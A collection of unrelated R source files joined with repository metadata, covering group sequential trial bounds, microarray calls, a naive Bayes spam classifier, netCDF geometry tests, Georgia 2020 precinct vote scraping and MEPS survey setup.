rownames(ans$bounds1) <- rownames(ans$bounds1, do.NULL = FALSE, prefix = "")
print.default(cbind(ans$bounds,ans$bounds1[,-1]), quote = FALSE, print.gap = 2, ...)
cat("\nPower : ", ans$power, "\n","\nDrift: ", ans$drift, "\n\n")
}
if (ans$type==3){
low <- ans$interval$lower.limit
up <- ans$interval$upper.limit
cat("\nConfidence interval at the end of the trial: \n", "\nConfidence level: ", ans$level, "\nLast Z value: ", ans$fzvalue, "\n", 100*ans$level, "% confidence interval: (", low, ",", up, ")\n")
}
if (ans$type==4){
cat("\nAdjusted p-value: \n", "\nOrdering method: ", ans$p.ordering, "\nLook: ", ans$analysis.time, "\nZ value observed at that time: ", ans$fzvalue, "\n", "P-value: ", ans$p.value, "\n")
}
}
"print.summary.bounds" <-
function(x, digit = 5, ...)
{
z <- x
if (!inherits(z, "summary.bounds"))
stop("'x' must inherit from class \"summary.bounds\"")
rownames(z$bounds) <- rownames(z$bounds, do.NULL = FALSE, prefix = "")
if (z$type%in%(1:3)){
cat("\nLan-DeMets bounds for a given spending function \n", "\nn = ", z$n, "\nOverall alpha: ", z$oalpha, "\n")
}
if (z$type%in%(4:6)){
cat("\nGroup sequential boundaries \n", "\nn = ", z$n, "\nOverall alpha: ", z$oalpha, "\n")
}
if (z$type%in%c(1,4)){
if (z$type==1){
cat("\nType: One-Sided Bounds", "\nalpha: ", z$alpha, "\nSpending function:", z$spending, "\n", "\nBoundaries:\n")
}
if (z$type==4){
cat("\nType: One-Sided Bounds", "\nalpha: ", z$alpha, "\nBoundary type (non-alpha-spending):", z$spending, "\n", "\nBoundaries:\n")
}
if (ncol(z$bounds)==6)
print.default(z$bounds[,-2], digits = 5, quote = FALSE, print.gap = 2)
else
print.default(z$bounds[,-3], digits = 5, quote = FALSE, print.gap = 2)
}
else{
if (z$type==2){
if (length(z$alpha)==2){
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", z$alpha[1], "\nUpper alpha: ", z$alpha[1], "\nSpending function: ", z$spending, "\n")
}
else{
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", z$alpha/2, "\nUpper alpha: ", z$alpha/2, "\nSpending function: ", z$spending, "\n")
}
}
if (z$type==5){
if (length(z$alpha)==2){
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", z$alpha[1], "\nUpper alpha: ", z$alpha[1], "\nBoundary type (non-alpha-spending): ", z$spending, "\n")
}
else{
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", z$alpha/2, "\nUpper alpha: ", z$alpha/2, "\nBoundary type (non-alpha-spending): ", z$spending, "\n")
}
}
if (z$type==3){
cat("\nType: Two-Sided Asymmetric Bounds", "\nLower alpha: ", z$alpha[1], "\nSpending function for the lower boundary: ", z$spending[1], "\nUpper alpha: ", z$alpha[2], "\nSpending function for the upper boundary: ", z$spending[2], "\n")
}
if (z$type==6){
cat("\nType: Two-Sided Asymmetric Bounds", "\nLower alpha: ", z$alpha[1], "\nType of (non-alpha-spending) lower boundary: ", z$spending[1], "\nUpper alpha: ", z$alpha[2], "\nType of (non-alpha-spending) upper boundary: ", z$spending[2], "\n")
}
cat("\nBoundaries:\n")
print.default(z$bounds, digits = digit, quote = FALSE, print.gap = 2)
}
}
"print.summary.drift" <-
function(x, digit = 5, ...)
{
z <- x
if (!inherits(z, "summary.drift"))
stop("'x' must inherit from class \"summary.drift\"")
rownames(z$bounds) <- rownames(z$bounds, do.NULL = FALSE, prefix = "")
cat("\nLan-DeMets method for group sequential boundaries \n", "\nn = ", z$n, "\n")
cat("\nBoundaries: \n")
print.default(z$bounds, digits = digit, quote = FALSE, print.gap = 2)
if ((z$type==1)|(z$type==2)){
cat("\nPower : ", z$power, "\n","\nDrift: ", z$drift, "\n", "\n")
rownames(z$bounds1) <- rownames(z$bounds1, do.NULL = FALSE, prefix = "")
print.default(z$bounds1, digits = digit, quote = FALSE, print.gap = 2)
}
if (z$type==3){
low <- z$interval$lower.limit
up <- z$interval$upper.limit
cat("\nConfidence interval at the end of the trial: \n", "\nConfidence level: ", z$level, "\nLast Z value: ", z$fzvalue, "\n", 100*z$level, "% confidence interval: (", low, ",", up, ")\n")
}
if (z$type==4){
cat("\nAdjusted p-value: \n", "\nOrdering method: ", z$p.ordering, "\nLook: ", z$analysis.time, "\nZ value observed at that time: ", z$fzvalue, "\n", "P-value: ", z$p.value, "\n")
}
}
"qp" <-
function(xq,last,nints,yam1,ybm1,stdv){
hlast <- (ybm1-yam1)/nints
grid <- seq(yam1,ybm1,length=nints+1)
fun <- last*pnorm(grid,mean=xq,sd=stdv)
qp <- 0.5*hlast*(2*sum(fun)-fun[1]-fun[length(fun)]) # This is "trap"
return(qp)
}
"search.glan.obrien" <-
function(k,c,alpha){
return(glan((1:k)/k,rep(-8,k),c/sqrt((1:k)/k),0)$pr-alpha)
}
"search.glan.pocock" <-
function(k,c,alpha){
return(glan((1:k)/k,rep(-8,k),rep(c,k),0)$pr-alpha)
}
"summary.bounds" <-
function (object, digits=5, ...)
{
z <- object
if (!inherits(z, "bounds"))
stop("'object' must inherit from class \"bounds\"")
p <- length(z$time)
if (identical(z$time,z$time2)){
b <- matrix(NA, p, 6)
b[,1:6] <- c(z$time, z$lower.bounds, z$upper.bounds, z$exit.pr, z$diff.pr, z$nom.alpha)
colnames(b) <- c("Time", "Lower", "Upper", "Exit pr.", "Diff. pr.", "Nominal Alpha")
}
else{
b <- matrix(NA, p, 7)
b[,1:7] <- c(z$time, z$time2, z$lower.bounds, z$upper.bounds, z$exit.pr, z$diff.pr, z$nom.alpha)
colnames(b) <- c("Time", "Time 2", "Lower", "Upper", "Exit pr.", "Diff. pr.", "Nominal Alpha")
}
ans <- list()
ans$type <- z$bounds.type
ans$spending <- z$spending.type
ans$n <- p
ans$alpha <- z$alpha
ans$oalpha <- z$overall.alpha
ans$bounds <- b
class(ans) <- "summary.bounds"
return(ans)
}
"summary.drift" <-
function (object, ...)
{
z <- object
if (!inherits(z, "drift"))
stop("'object' must inherit from class \"drift\"")
ans <- list()
ans$type <- z$type
ans$n <- length(z$time)
if ((ans$type==1)|(ans$type==2)){
ans$power <- z$power
ans$drift <- z$drift
if (identical(z$time,z$time2)){
b <- matrix(NA, ans$n, 5)
b[,1:5] <- c(z$time, z$lower.probs, z$upper.probs, z$exit.probs, z$cum.exit)
colnames(b) <- c("Time", "Lower probs", "Upper probs", "Exit pr.", "Cum exit pr.")
ans$bounds1 <- b
}
else{
b <- matrix(NA, ans$n, 6)
b[,1:6] <- c(z$time, z$time2, z$lower.probs, z$upper.probs, z$exit.probs, z$cum.exit)
colnames(b) <- c("Time", "Time 2", "Lower probs", "Upper probs", "Exit pr.", "Cum exit pr.")
ans$bounds1 <- b
}
}
if (ans$type==3){
ans$level <- z$conf.level
ans$fzvalue <- z$final.zvalue
ans$interval <- z$conf.interval
}
if (ans$type==4){
if (z$p.ordering=="SW"){
ans$p.ordering <- "Stage-wise"
}
if (z$p.ordering=="LR"){
ans$p.ordering <- "Likelihood ratio "
}
ans$fzvalue <- z$final.zvalue
ans$analysis.time <- z$analysis.time
ans$p.value <- z$p.value
}
if (identical(z$time,z$time2)){
ans$bounds <- matrix(c(z$time, z$lower.bounds, z$upper.bounds), ncol=3, dimnames = list(NULL,c("Time", "Lower", "Upper")))
}
else{
ans$bounds <- matrix(c(z$time, z$time2, z$lower.bounds, z$upper.bounds), ncol=4, dimnames = list(NULL,c("Time", "Time 2", "Lower", "Upper")))
}
class(ans) <- "summary.drift"
return(ans)
}
## Local Variables:
## End:
|
library("affy")
library("annotate")
library("hgu133a2.db")
data = ReadAffy()
calls = mas5calls(data)
probeids = rownames(exprs(calls))
toGeneIDs = getEG(probeids, "hgu133a2.db")
toSymbols = getSYMBOL(probeids, "hgu133a2.db")
PMATable = data.frame(toGeneIDs, toSymbols, exprs(calls))
write.table(PMATable, file = "PMATable.txt")
# ls()
# attributes(calls)
# mode(calls)
| /csplugins/trunk/ucsd/rsaito/rs_Progs/rs_R/BioConductor/AffyCalls/mas5calls_test2.R | no_license | ahdahddl/cytoscape | R | false | false | 372 | r |
library("affy")
library("annotate")
library("hgu133a2.db")
data = ReadAffy()
calls = mas5calls(data)
probeids = rownames(exprs(calls))
toGeneIDs = getEG(probeids, "hgu133a2.db")
toSymbols = getSYMBOL(probeids, "hgu133a2.db")
PMATable = data.frame(toGeneIDs, toSymbols, exprs(calls))
write.table(PMATable, file = "PMATable.txt")
# ls()
# attributes(calls)
# mode(calls)
|
#load the packages
library(tm)
library(wordcloud)
library(gmodels)
library(SnowballC)
#read the data from the dataset
spam <- read.csv('sms_spam.csv')
spam$type <- factor(spam$type)
table(spam$type)
spam_messages <- subset(spam,type=="spam")
ham_messages <- subset(spam, type=="ham")
wordcloud(spam_messages$text, max.words = 100, scale = c(3,0.5))
#create the Document Term Matrix by performing various operations
#like convert the words into lowercase,stemming,remove numbers,
#remove punctuation,remove stop words
corpus <- VCorpus(VectorSource(spam$text))
dtm <- DocumentTermMatrix(corpus, control = list(
tolower = TRUE,
removeNumbers = TRUE,
removePunctuation = TRUE,
stopwords=TRUE,
stemming = TRUE
))
#create the train labels and test tables
trainLabels <-spam[1:4169,]$type
testLabels <- spam[4170:5559,]$type
prop.table(table(trainLabels))
#create the train data and test data
dtmTrain <- dtm[1:4169,]
dtmTest <- dtm[4170:5559,]
#low frequency words are removed i.e, frequency<5
freqWords <- findFreqTerms(dtmTrain,5)
#create the training data and testig data
freqTrain <- dtmTrain[,freqWords]
freqTest <- dtmTest[,freqWords]
#The DTM matrix uses 1's or 0's depending on whether
#the word occurs in the sentence or not. Naive Bayes
#classifier works with categorical features. 1 and 0
#is therefore converted to Yes or No.
convert_counts <- function(x) {
x <- ifelse(x > 0, "Yes", "No")
}
#call convert_counts
train <- apply(freqTrain, MARGIN = 2,
convert_counts)
test <- apply(freqTest, MARGIN = 2,
convert_counts)
#create the model
classifier <- naiveBayes(train, trainLabels)
#predict using test data
testPredict <- predict(classifier, test)
#Confusion matrix, to check the performance of the model
CrossTable(testPredict, testLabels,dnn = c('predicted', 'actual'))
## Cell Contents
## |-------------------------|
## | N |
## | N / Row Total |
## | N / Col Total |
## |-------------------------|
##
##
## Total Observations in Table: 1390
##
##
## | actual
## predicted | ham | spam | Row Total |
## -------------|-----------|-----------|-----------|
## ham | 1200 | 23 | 1223 |
## | 0.981 | 0.019 | 0.880 |
## | 0.993 | 0.127 | |
## -------------|-----------|-----------|-----------|
## spam | 9 | 158 | 167 |
## | 0.054 | 0.946 | 0.120 |
## | 0.007 | 0.873 | |
## -------------|-----------|-----------|-----------|
## Column Total | 1209 | 181 | 1390 |
## | 0.870 | 0.130 | |
## -------------|-----------|-----------|-----------|
| /spam_filtering.R | no_license | AAsohail/spam_detection | R | false | false | 2,897 | r | #load the packages
library(tm)
library(wordcloud)
library(gmodels)
library(SnowballC)
#read the data from the dataset
spam <- read.csv('sms_spam.csv')
spam$type <- factor(spam$type)
table(spam$type)
spam_messages <- subset(spam,type=="spam")
ham_messages <- subset(spam, type=="ham")
wordcloud(spam_messages$text, max.words = 100, scale = c(3,0.5))
#create the Document Term Matrix by performing various operations
#like convert the words into lowercase,stemming,remove numbers,
#remove punctuation,remove stop words
corpus <- VCorpus(VectorSource(spam$text))
dtm <- DocumentTermMatrix(corpus, control = list(
tolower = TRUE,
removeNumbers = TRUE,
removePunctuation = TRUE,
stopwords=TRUE,
stemming = TRUE
))
#create the train labels and test tables
trainLabels <-spam[1:4169,]$type
testLabels <- spam[4170:5559,]$type
prop.table(table(trainLabels))
#create the train data and test data
dtmTrain <- dtm[1:4169,]
dtmTest <- dtm[4170:5559,]
#low frequency words are removed i.e, frequency<5
freqWords <- findFreqTerms(dtmTrain,5)
#create the training data and testig data
freqTrain <- dtmTrain[,freqWords]
freqTest <- dtmTest[,freqWords]
#The DTM matrix uses 1's or 0's depending on whether
#the word occurs in the sentence or not. Naive Bayes
#classifier works with categorical features. 1 and 0
#is therefore converted to Yes or No.
convert_counts <- function(x) {
x <- ifelse(x > 0, "Yes", "No")
}
#call convert_counts
train <- apply(freqTrain, MARGIN = 2,
convert_counts)
test <- apply(freqTest, MARGIN = 2,
convert_counts)
#create the model
classifier <- naiveBayes(train, trainLabels)
#predict using test data
testPredict <- predict(classifier, test)
#Confusion matrix, to check the performance of the model
CrossTable(testPredict, testLabels,dnn = c('predicted', 'actual'))
## Cell Contents
## |-------------------------|
## | N |
## | N / Row Total |
## | N / Col Total |
## |-------------------------|
##
##
## Total Observations in Table: 1390
##
##
## | actual
## predicted | ham | spam | Row Total |
## -------------|-----------|-----------|-----------|
## ham | 1200 | 23 | 1223 |
## | 0.981 | 0.019 | 0.880 |
## | 0.993 | 0.127 | |
## -------------|-----------|-----------|-----------|
## spam | 9 | 158 | 167 |
## | 0.054 | 0.946 | 0.120 |
## | 0.007 | 0.873 | |
## -------------|-----------|-----------|-----------|
## Column Total | 1209 | 181 | 1390 |
## | 0.870 | 0.130 | |
## -------------|-----------|-----------|-----------|
|
library("ncdf4")
context("NCDF SG polygonData tests")
# data prep.
# library(rgdal)
# shapeData<-readOGR(dsn = "data/Yahara_alb/Yahara_River_HRUs_alb_eq.shp",
# layer = "Yahara_River_HRUs_alb_eq",
# stringsAsFactors = FALSE)
# saveRDS(shapeData,file="data/yahara_shapefile_data.rds")
test_that("A whole shapefile can be written", {
polygonData <- readRDS("data/yahara_shapefile_data.rds")
nc_file <- ToNCDFSG(nc_file=tempfile(), geomData = polygonData)
nc<-nc_open(nc_file)
crs <- list(grid_mapping_name = "albers_conical_equal_area",
longitude_of_central_meridian = -96,
latitude_of_projection_origin = 23,
false_easting = 0.0,
false_northing = 0.0,
standard_parallel = c(29.5, 45.5),
semi_major_axis = 6378137.0,
inverse_flattening = 298.257223563,
longitude_of_prime_meridian = 0)
expect_equal(ncatt_get(nc, pkg.env$crs_var_name)[names(crs)], crs)
expect_equal(as.numeric(polygonData@data$GRIDCODE),as.numeric(ncvar_get(nc, varid = "GRIDCODE")))
expect_equal(length(nc$dim$instance$vals), length(polygonData@polygons))
for(var in names(polygonData@data)) {
expect_equal(ncatt_get(nc, var, pkg.env$geometry_container_att_name)$value,
pkg.env$geom_container_var_name)
expect_equal(ncatt_get(nc, var, pkg.env$crs)$value,
pkg.env$crs_var_name)
}
coords<-polygonData@polygons[[1]]@Polygons[[1]]@coords
expect_equal(as.numeric(coords[nrow(coords):1,1]),as.numeric(ncvar_get(nc, varid = "x", start = c(1), count = c(118))))
expect_equal(as.numeric(coords[nrow(coords):1,2]),as.numeric(ncvar_get(nc, varid = "y", start = c(1), count = c(118))))
# Check to make sure a hole is encoded correctly.
node_count <- ncvar_get(nc, pkg.env$node_count_var_name)
part_node_count <- ncvar_get(nc, pkg.env$part_node_count_var_name)
part_type <- ncvar_get(nc, pkg.env$part_type_var_name)
expect_equal(length(polygonData@polygons), length(node_count))
p <- 1
for(i in 1:length(node_count)) {
nCount <- 0
for(j in 1:length(polygonData@polygons[[i]]@Polygons)) {
if(polygonData@polygons[[i]]@Polygons[[j]]@hole) expect_equal(part_type[p], pkg.env$hole_val)
expect_equal(length(polygonData@polygons[[i]]@Polygons[[j]]@coords[,1]), part_node_count[p])
nCount <- nCount + part_node_count[p]
p <- p + 1
}
expect_equal(nCount, node_count[i])
}
checkAllPoly(polygonData, ncvar_get(nc,pkg.env$node_count_var_name),
ncvar_get(nc,pkg.env$part_node_count_var_name),
ncvar_get(nc,pkg.env$part_type_var_name))
returnPolyData<-FromNCDFSG(nc_file)
compareSP(polygonData, returnPolyData)
for(name in names(polygonData@data)) {
expect_equal(as.character(polygonData@data[name]), as.character(returnPolyData@data[name]))
}
for(i in 1:length(returnPolyData@polygons)) {
expect_equal(length(returnPolyData@polygons[[i]]@Polygons), length(polygonData@polygons[[i]]@Polygons))
for(j in 1:length(returnPolyData@polygons[[i]]@Polygons)) {
expect_equal(length(returnPolyData@polygons[[i]]@Polygons[[j]]@coords), length(polygonData@polygons[[i]]@Polygons[[j]]@coords))
}
}
# writePolyShape(returnPolyData, "yaharaData_test")
})
| /tests/testthat/test_polydata.R | permissive | nemochina2008/netcdf.dsg | R | false | false | 3,316 | r | library("ncdf4")
context("NCDF SG polygonData tests")
# data prep.
# library(rgdal)
# shapeData<-readOGR(dsn = "data/Yahara_alb/Yahara_River_HRUs_alb_eq.shp",
# layer = "Yahara_River_HRUs_alb_eq",
# stringsAsFactors = FALSE)
# saveRDS(shapeData,file="data/yahara_shapefile_data.rds")
test_that("A whole shapefile can be written", {
polygonData <- readRDS("data/yahara_shapefile_data.rds")
nc_file <- ToNCDFSG(nc_file=tempfile(), geomData = polygonData)
nc<-nc_open(nc_file)
crs <- list(grid_mapping_name = "albers_conical_equal_area",
longitude_of_central_meridian = -96,
latitude_of_projection_origin = 23,
false_easting = 0.0,
false_northing = 0.0,
standard_parallel = c(29.5, 45.5),
semi_major_axis = 6378137.0,
inverse_flattening = 298.257223563,
longitude_of_prime_meridian = 0)
expect_equal(ncatt_get(nc, pkg.env$crs_var_name)[names(crs)], crs)
expect_equal(as.numeric(polygonData@data$GRIDCODE),as.numeric(ncvar_get(nc, varid = "GRIDCODE")))
expect_equal(length(nc$dim$instance$vals), length(polygonData@polygons))
for(var in names(polygonData@data)) {
expect_equal(ncatt_get(nc, var, pkg.env$geometry_container_att_name)$value,
pkg.env$geom_container_var_name)
expect_equal(ncatt_get(nc, var, pkg.env$crs)$value,
pkg.env$crs_var_name)
}
coords<-polygonData@polygons[[1]]@Polygons[[1]]@coords
expect_equal(as.numeric(coords[nrow(coords):1,1]),as.numeric(ncvar_get(nc, varid = "x", start = c(1), count = c(118))))
expect_equal(as.numeric(coords[nrow(coords):1,2]),as.numeric(ncvar_get(nc, varid = "y", start = c(1), count = c(118))))
# Check to make sure a hole is encoded correctly.
node_count <- ncvar_get(nc, pkg.env$node_count_var_name)
part_node_count <- ncvar_get(nc, pkg.env$part_node_count_var_name)
part_type <- ncvar_get(nc, pkg.env$part_type_var_name)
expect_equal(length(polygonData@polygons), length(node_count))
p <- 1
for(i in 1:length(node_count)) {
nCount <- 0
for(j in 1:length(polygonData@polygons[[i]]@Polygons)) {
if(polygonData@polygons[[i]]@Polygons[[j]]@hole) expect_equal(part_type[p], pkg.env$hole_val)
expect_equal(length(polygonData@polygons[[i]]@Polygons[[j]]@coords[,1]), part_node_count[p])
nCount <- nCount + part_node_count[p]
p <- p + 1
}
expect_equal(nCount, node_count[i])
}
checkAllPoly(polygonData, ncvar_get(nc,pkg.env$node_count_var_name),
ncvar_get(nc,pkg.env$part_node_count_var_name),
ncvar_get(nc,pkg.env$part_type_var_name))
returnPolyData<-FromNCDFSG(nc_file)
compareSP(polygonData, returnPolyData)
for(name in names(polygonData@data)) {
expect_equal(as.character(polygonData@data[name]), as.character(returnPolyData@data[name]))
}
for(i in 1:length(returnPolyData@polygons)) {
expect_equal(length(returnPolyData@polygons[[i]]@Polygons), length(polygonData@polygons[[i]]@Polygons))
for(j in 1:length(returnPolyData@polygons[[i]]@Polygons)) {
expect_equal(length(returnPolyData@polygons[[i]]@Polygons[[j]]@coords), length(polygonData@polygons[[i]]@Polygons[[j]]@coords))
}
}
# writePolyShape(returnPolyData, "yaharaData_test")
})
|
source("https://raw.githubusercontent.com/jcervas/R-Functions/main/GERRYfunctions.R")
# Will eventually replace with full list of URLs
# urls <- c("https://results.enr.clarityelections.com//GA/Appling/105371/269554/json/","https://results.enr.clarityelections.com//GA/Sumter/105499/270350/json/")
urls <- read.csv("https://raw.githubusercontent.com/jcervas/Georgia-2020/main/Georgia%202020%20Vote%20Links.csv", header=F)
urls <- unlist(urls)
# For looping through three types of ballots
votetype.json <- c("Election_Day_Votes", "Absentee_by_Mail_Votes", "Advanced_Voting_Votes", "Provisional_Votes") # No longer necessary, ALL.json has all the data aggregated. Keep in case we want to view differences
tmp <- list()
for (j in 1:length(urls)) {
# cnty.tmp1 <- fromJSON(paste0(urls[j], votetype.json[1], ".json"))
# cnty.tmp2 <- fromJSON(paste0(urls[j], votetype.json[2], ".json"))
# cnty.tmp3 <- fromJSON(paste0(urls[j], votetype.json[3], ".json"))
# cnty.tmp4 <- fromJSON(paste0(urls[j], votetype.json[4], ".json"))
cnty.tmp <- jsonlite::fromJSON(paste0(urls[j],"ALL.json"))
dem.tmp <- list()
rep.tmp <- list()
other.tmp <- list()
k.list <- length(cnty.tmp$Contests$A) - 1 # Last row is the county total...
for (k in 1:k.list) {
# cnty.tmp.tmp1 <- unlist(cnty.tmp1$Contests$V[[k]][1])
# cnty.tmp.tmp2 <- unlist(cnty.tmp2$Contests$V[[k]][1])
# cnty.tmp.tmp3 <- unlist(cnty.tmp3$Contests$V[[k]][1])
# cnty.tmp.tmp4 <- unlist(cnty.tmp4$Contests$V[[k]][1])
# rep.tmp[[k]] <- cnty.tmp.tmp1[1]+cnty.tmp.tmp2[1]+cnty.tmp.tmp3[1]+cnty.tmp.tmp4[1]
# dem.tmp[[k]] <- cnty.tmp.tmp1[2]+cnty.tmp.tmp2[2]+cnty.tmp.tmp3[2]+cnty.tmp.tmp4[2]
# other.tmp[[k]] <- cnty.tmp.tmp1[3]+cnty.tmp.tmp2[3]+cnty.tmp.tmp3[3]+cnty.tmp.tmp4[3]
cnty.tmp.tmp <- unlist(cnty.tmp$Contests$V[[k]][1])
rep.tmp[[k]] <- cnty.tmp.tmp[1]
dem.tmp[[k]] <- cnty.tmp.tmp[2]
other.tmp[[k]] <- cnty.tmp.tmp[3]
}
precinct.list <- cnty.tmp$Contests$A
precinct.list <- precinct.list[1:k.list]
# Test code to get county name
cnty.tmp <- substring(urls[j], regexpr("GA/", urls[j]) +3)
county.name <- sub("\\/.*", "", cnty.tmp)
tmp[[j]] <- data.frame(state="Georgia",county=rep(county.name,k.list),precinct=precinct.list,rep=do.call(rbind,rep.tmp),dem=do.call(rbind,dem.tmp),other=do.call(rbind,other.tmp)) #Creates list of precincts, by county
}
GA_precincts <- do.call(rbind, tmp)
head(GA_precincts)
GA_precincts$precinct <- toupper(GA_precincts$precinct)
GA_precincts$dem_TP <- as.integer(100*round(replaceNA(two_party(GA_precincts$dem,GA_precincts$rep)),1))
write.csv(GA_precincts, "/Users/user/Google Drive/GitHub/Georgia-2020/GA_precincts_pres.csv", row.names=F)
# We also need precinct shapefiles to match on.
# https://doi.org/10.7910/DVN/XPW7T7
# library(rgdal)
u <- "https://raw.githubusercontent.com/jcervas/Georgia-2020/main/ga_2020_general.json"
# downloader::download(url = u, destfile = "/tmp/ga.GeoJSON")
# ga <- readOGR(dsn = "/tmp/ga.GeoJSON", layer = "OGRGeoJSON")
ga <- readOGR(dsn = u, layer = "ga_2020_general")
plot(ga) | /maincode_GA.R | no_license | jcervas/Georgia-2020 | R | false | false | 3,073 | r |
source("https://raw.githubusercontent.com/jcervas/R-Functions/main/GERRYfunctions.R")
# Will eventually replace with full list of URLs
# urls <- c("https://results.enr.clarityelections.com//GA/Appling/105371/269554/json/","https://results.enr.clarityelections.com//GA/Sumter/105499/270350/json/")
urls <- read.csv("https://raw.githubusercontent.com/jcervas/Georgia-2020/main/Georgia%202020%20Vote%20Links.csv", header=F)
urls <- unlist(urls)
# For looping through three types of ballots
votetype.json <- c("Election_Day_Votes", "Absentee_by_Mail_Votes", "Advanced_Voting_Votes", "Provisional_Votes") # No longer necessary, ALL.json has all the data aggregated. Keep in case we want to view differences
tmp <- list()
for (j in 1:length(urls)) {
# cnty.tmp1 <- fromJSON(paste0(urls[j], votetype.json[1], ".json"))
# cnty.tmp2 <- fromJSON(paste0(urls[j], votetype.json[2], ".json"))
# cnty.tmp3 <- fromJSON(paste0(urls[j], votetype.json[3], ".json"))
# cnty.tmp4 <- fromJSON(paste0(urls[j], votetype.json[4], ".json"))
cnty.tmp <- jsonlite::fromJSON(paste0(urls[j],"ALL.json"))
dem.tmp <- list()
rep.tmp <- list()
other.tmp <- list()
k.list <- length(cnty.tmp$Contests$A) - 1 # Last row is the county total...
for (k in 1:k.list) {
# cnty.tmp.tmp1 <- unlist(cnty.tmp1$Contests$V[[k]][1])
# cnty.tmp.tmp2 <- unlist(cnty.tmp2$Contests$V[[k]][1])
# cnty.tmp.tmp3 <- unlist(cnty.tmp3$Contests$V[[k]][1])
# cnty.tmp.tmp4 <- unlist(cnty.tmp4$Contests$V[[k]][1])
# rep.tmp[[k]] <- cnty.tmp.tmp1[1]+cnty.tmp.tmp2[1]+cnty.tmp.tmp3[1]+cnty.tmp.tmp4[1]
# dem.tmp[[k]] <- cnty.tmp.tmp1[2]+cnty.tmp.tmp2[2]+cnty.tmp.tmp3[2]+cnty.tmp.tmp4[2]
# other.tmp[[k]] <- cnty.tmp.tmp1[3]+cnty.tmp.tmp2[3]+cnty.tmp.tmp3[3]+cnty.tmp.tmp4[3]
cnty.tmp.tmp <- unlist(cnty.tmp$Contests$V[[k]][1])
rep.tmp[[k]] <- cnty.tmp.tmp[1]
dem.tmp[[k]] <- cnty.tmp.tmp[2]
other.tmp[[k]] <- cnty.tmp.tmp[3]
}
precinct.list <- cnty.tmp$Contests$A
precinct.list <- precinct.list[1:k.list]
# Test code to get county name
cnty.tmp <- substring(urls[j], regexpr("GA/", urls[j]) +3)
county.name <- sub("\\/.*", "", cnty.tmp)
tmp[[j]] <- data.frame(state="Georgia",county=rep(county.name,k.list),precinct=precinct.list,rep=do.call(rbind,rep.tmp),dem=do.call(rbind,dem.tmp),other=do.call(rbind,other.tmp)) #Creates list of precincts, by county
}
GA_precincts <- do.call(rbind, tmp)
head(GA_precincts)
GA_precincts$precinct <- toupper(GA_precincts$precinct)
GA_precincts$dem_TP <- as.integer(100*round(replaceNA(two_party(GA_precincts$dem,GA_precincts$rep)),1))
write.csv(GA_precincts, "/Users/user/Google Drive/GitHub/Georgia-2020/GA_precincts_pres.csv", row.names=F)
# We also need precinct shapefiles to match on.
# https://doi.org/10.7910/DVN/XPW7T7
# library(rgdal)
u <- "https://raw.githubusercontent.com/jcervas/Georgia-2020/main/ga_2020_general.json"
# downloader::download(url = u, destfile = "/tmp/ga.GeoJSON")
# ga <- readOGR(dsn = "/tmp/ga.GeoJSON", layer = "OGRGeoJSON")
ga <- readOGR(dsn = u, layer = "ga_2020_general")
plot(ga) |
getImageFeature <- function(anImage, nPatches, nDivs) {
# nDivs: total number of divisions
fCounter <- 1
imgFeature <- vector()
for(i in 1:ncol(anImage)) {
anImgLayer <- anImage[, i]
imgLayerMatrix <- matrix(data = anImgLayer, nrow = sqrt(nPatches), ncol = sqrt(nPatches))
len <- nrow(imgLayerMatrix) / (nDivs/2)
for(j in 1:(nDivs/2)) {
rowInd <- (j-1)*len + 1
for(k in 1:(nDivs/2)) {
colInd <- (k-1)*len + 1
subMatrix <- imgLayerMatrix[rowInd:(rowInd+len-1), colInd:(colInd+len-1)]
imgFeature[fCounter] <- sum(subMatrix)
fCounter <- fCounter + 1
}
}
}
return(imgFeature)
}
| /code/utils/getImageFeature.R | no_license | ngopee/10-601-project | R | false | false | 664 | r | getImageFeature <- function(anImage, nPatches, nDivs) {
# nDivs: total number of divisions
fCounter <- 1
imgFeature <- vector()
for(i in 1:ncol(anImage)) {
anImgLayer <- anImage[, i]
imgLayerMatrix <- matrix(data = anImgLayer, nrow = sqrt(nPatches), ncol = sqrt(nPatches))
len <- nrow(imgLayerMatrix) / (nDivs/2)
for(j in 1:(nDivs/2)) {
rowInd <- (j-1)*len + 1
for(k in 1:(nDivs/2)) {
colInd <- (k-1)*len + 1
subMatrix <- imgLayerMatrix[rowInd:(rowInd+len-1), colInd:(colInd+len-1)]
imgFeature[fCounter] <- sum(subMatrix)
fCounter <- fCounter + 1
}
}
}
return(imgFeature)
}
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/CoordCollapse.R
\name{CoordCollapse}
\alias{CoordCollapse}
\title{Removes duplicate geographic locations and binds coordinates into a single element}
\usage{
CoordCollapse(longs, lats)
}
\arguments{
\item{longs}{- Longitudinal coordinates of occurrences in decimal degrees}
\item{lats}{- Latitudinal coordinates of occurrences in decimal degrees}
}
\value{
Returns a 2-column array of coordinates without any duplicate locations
}
\description{
Removes duplicate geographic locations and binds coordinates into a single element
}
\note{
Points are truncated to the hundredths place before checking for duplicates
}
\examples{
longs<-c(34,133,-45)
lats<-c(-12,44,76)
CoordCollapse(longs,lats)
}
| /man/CoordCollapse.Rd | no_license | cran/GeoRange | R | false | true | 800 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/CoordCollapse.R
\name{CoordCollapse}
\alias{CoordCollapse}
\title{Removes duplicate geographic locations and binds coordinates into a single element}
\usage{
CoordCollapse(longs, lats)
}
\arguments{
\item{longs}{- Longitudinal coordinates of occurrences in decimal degrees}
\item{lats}{- Latitudinal coordinates of occurrences in decimal degrees}
}
\value{
Returns a 2-column array of coordinates without any duplicate locations
}
\description{
Removes duplicate geographic locations and binds coordinates into a single element
}
\note{
Points are truncated to the hundredths place before checking for duplicates
}
\examples{
longs<-c(34,133,-45)
lats<-c(-12,44,76)
CoordCollapse(longs,lats)
}
|
# Install and load packages
package_names <- c("survey","dplyr","foreign","devtools")
lapply(package_names, function(x) if(!x %in% installed.packages()) install.packages(x))
lapply(package_names, require, character.only=T)
install_github("e-mitchell/meps_r_pkg/MEPS")
library(MEPS)
options(survey.lonely.psu="adjust")
# Load FYC file
FYC <- read.xport('C:/MEPS/h121.ssp');
year <- 2008
if(year <= 2001) FYC <- FYC %>% mutate(VARPSU = VARPSU08, VARSTR=VARSTR08)
if(year <= 1998) FYC <- FYC %>% rename(PERWT08F = WTDPER08)
if(year == 1996) FYC <- FYC %>% mutate(AGE42X = AGE2X, AGE31X = AGE1X)
FYC <- FYC %>%
